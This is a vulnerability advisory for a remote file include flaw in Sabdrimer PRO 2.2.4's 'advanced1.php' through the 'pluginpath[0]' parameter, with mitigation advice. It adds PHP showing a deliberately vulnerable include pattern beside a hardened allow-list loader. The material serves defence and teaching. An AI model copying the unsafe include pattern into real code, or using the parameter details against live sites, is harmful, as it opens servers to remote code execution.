Vendor: Sabdrimer CMS
By: A.nosrati
CVSS: 7.5 (HIGH)
CWE: CWE-98 (Remote File Include)
Product Name: Sabdrimer CMS
Affected Version From: 2.2.4
Affected Version To: 2.2.4
Patch Exists: NO
Related CWE: N/A
CPE: a:sabdrimer:sabdrimer_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Sabdrimer PRO (v.2.2.4) Remote File Include Vulnerability
Sabdrimer PRO (v.2.2.4) is vulnerable to Remote File Include. The vulnerability exists because user-supplied input in the 'pluginpath[0]' parameter of the 'advanced1.php' script is not sanitized before it is used in an include path. An attacker can exploit this to execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request that points the include at a file containing malicious code. The vulnerability is only exploitable if the 'register_globals' PHP option is set to 'On', since that option is what lets a request parameter populate the 'pluginpath' variable.
Mitigation:
Disable the 'register_globals' PHP option and ensure that user-supplied input is properly sanitized.
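As an added illustration (not Sabdrimer's own source, which this record does not reproduce), the general code pattern behind this class of bug and a hardened form of it; the function and plugin names are assumed:

```php
<?php
// Vulnerable pattern (illustrative reconstruction, not the actual advanced1.php):
// with register_globals=On, PHP pre-populates $pluginpath from the request, so a
// variable the script never initialises becomes attacker-controlled, and include()
// will fetch a remote URL from it when allow_url_include is also enabled.
function load_plugin_unsafe()
{
    global $pluginpath;                           // never set by the script itself
    include($pluginpath[0] . '/plugin.php');      // path taken straight from the request
}

// Hardened pattern: never derive an include path from request data; load only
// allow-listed plugins from a fixed directory and verify the resolved path stays
// inside it. Pair this with register_globals=Off and allow_url_include=Off in php.ini.
define('PLUGIN_DIR', __DIR__ . '/plugins');
$ALLOWED_PLUGINS = ['gallery', 'contact'];        // assumed plugin names

function load_plugin_safe(string $name): bool
{
    global $ALLOWED_PLUGINS;
    if (!in_array($name, $ALLOWED_PLUGINS, true)) {
        return false;                             // reject anything not explicitly allowed
    }
    $base = realpath(PLUGIN_DIR);
    $path = realpath(PLUGIN_DIR . '/' . $name . '/plugin.php');
    // realpath() resolves '..' and symlinks; the result must remain under PLUGIN_DIR
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include $path;
    return true;
}

// Runtime check a defender can add to a deployment: refuse to run with the
// unsafe settings this advisory depends on.
function php_config_is_safe(): bool
{
    return !filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)
        && !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}
```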